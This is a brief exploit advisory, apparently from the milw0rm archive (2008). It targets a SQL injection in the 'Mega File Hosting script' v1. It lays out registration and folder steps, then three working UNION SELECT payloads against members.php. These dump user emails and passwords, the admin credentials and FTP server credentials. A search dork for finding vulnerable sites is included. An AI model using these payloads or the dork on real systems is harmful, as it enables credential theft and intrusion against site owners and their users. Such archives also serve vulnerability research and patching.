Script: Mega File Hosting script
Type: SQL Injection
Step 1: Register an account
Step 2: login and go to /members.php?folders=1
Step 3: Create a folder with any name
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pass,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- to get the ftp server info (if its configured)
dork: "Powered by: MFH v1"
# milw0rm.com [2008-05-12]